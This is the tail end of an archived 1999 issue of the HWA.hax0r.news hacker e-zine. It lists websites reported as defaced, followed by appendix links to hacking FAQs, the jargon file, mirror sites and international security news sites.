http://www.lakehurst.navy.mil
http://www.unitedalbania.com
http://www.middletown.org
http://www.unitedalbania.com/
http://www.asus.com/
http://www.cyberflirt.com
http://www.swisstennis.com/
http://directory.metro.org
http://www.artleather.com/

May14th
contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://www.asus.com
http://kariba.africaonline.com
http://www.africaonline.com/
http://www.acb-is.net
http://directory.metro.org
http://www.cankaya.edu.t

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________



A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>


HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm


International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed



Belgium.......: http://bewoner.dma.be/cum/
<a href="http://bewoner.dma.be/cum/">Go there</a>

Brasil........: http://www.psynet.net/ka0z
<a href="http://www.psynet.net/ka0z/">Go there</a>

http://www.elementais.cjb.net
<a href="http://www.elementais.cjb.net/">Go there</a>

Columbia......: http://www.cascabel.8m.com
<a href="http://www.cascabel.8m.com/">Go there</a>

http://www.intrusos.cjb.net
<a href="http://www.intrusos.cjb.net">Go there</a>

Indonesia.....: http://www.k-elektronik.org/index2.html
<a href="http://www.k-elektronik.org/index2.html">Go there</a>

http://members.xoom.com/neblonica/
<a href="http://members.xoom.com/neblonica/">Go there</a>

http://hackerlink.or.id/
<a href="http://hackerlink.or.id/">Go there</a>

Netherlands...: http://security.pine.nl/
<a href="http://security.pine.nl/">Go there</a>

Russia........: http://www.tsu.ru/~eugene/
<a href="http://www.tsu.ru/~eugene/">Go there</a>

Singapore.....: http://www.icepoint.com
<a href="http://www.icepoint.com">Go there</a>

Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.

@HWA


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT